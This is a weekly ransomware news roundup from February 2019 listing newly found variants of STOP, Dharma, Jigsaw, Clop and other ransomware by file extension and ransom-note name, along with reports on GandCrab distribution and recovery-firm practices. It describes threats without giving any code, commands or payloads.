This week was mostly filled with new variants of existing ransomware such as STOP, Dharma, and Jigsaw ransomware. We did though have some interesting news, such as a ransomware downloader being created from the pixels of images and shady data recovery companies partnering with GandCrab to make extra profits.
Contributors and those who provided new ransomware information and stories this week include: @fwosar, @malwrhunterteam, @Seifreed, @PolarToffee, @demonslay335, @struppigel, @LawrenceAbrams, @malwareforme, @FourOctets, @jorntvdw, @BleepinComputer, @disabdillah,@petrovic082, @JakubKroustek, @_CPResearch_, @coveware, @dvk01uk, and @bromium.
February 2nd 2019
MalwareHunterTeam found a new variant of the PayDay Ransomware that uses a ransom note named HOW_TO_DECRYPT_MY_FILES.txt.
February 4th 2019
dis found a new variant of the STOP Ransomware that uses the .blower extension.
Michael Gillespie found a new variant of the RotorCrypt Ransomware that appends the “!email@example.com” extension.
Michael Gillespie found a new variant of the Dharma Ransomware that appends the .888 extension.
MalwareHunterTeam found a new Jigsaw Ransomware that uses the .PennyWise extension for encrypted files.
February 5th 2019
Petrovic found a new ransomware that appends the .crypted_pony_test_build_xxx_xxx_xxx_xxx_xxx extension to encrypted files.
February 6th 2019
Cryptominers infected roughly ten times more organizations during 2018 than ransomware did, however only one in five security professionals knew that their company’s systems have been impacted by a malware attack as reported by Check Point Research.
The GandCrab ransomware TOR site allows shady data recovery companies to hide the actual ransom cost from victims and it is currently being disseminated through a large assortment of distribution channels according to a Coveware report.
MalwareHunterTeam found a Russian ransomware sample that drops a ransom note named Your files are now encrypted.txt but does not use an extension. Uses a valid certificate.
February 7th 2019
Michael Gillespie found a new Ransomware that appends the .FileSlack extension and drops a ransom note named Readme_Restore_Files.txt.
Michael Gillespie is looking for a ransomware sample that appends the .pluto extension and drops a ransom note named !!!READ_IT!!!.txt.
Michael Gillespie found a new Jigsaw Ransomware variant that appends .paycoin to encrypted files and uses the following background.
Jakub Kroustek found new Dharma variants that appends the .amber or .frend extension.
February 8th 2019
A malicious spreadsheet has been discovered that builds a PowerShell command from individual pixels in a downloaded image of Mario from Super Mario Bros. When executed, this command will download and install malware such as the GandCrab Ransomware and other malware.
Michael Gillespie found a new ransomware that appends the .Clop extension to encrypted file names and drops a ransom note named ClopReadMe.txt.
My Online Security reports:
It’s Friday afternoon at the end of a busy week for many people and we get yet another Gandcrab ransomware campaign. This campaign is slightly different to previous versions that I have seen. We generally see Gandcrab delivered via Office ( normally Word) documents, either Macros or possibly Equation editor or other embedded ole object exploits. Today’s version is the first time that I have seen a js file inside a zip that was password protected as the initial vector. You need the password “invoice123” to be able to open the zip file.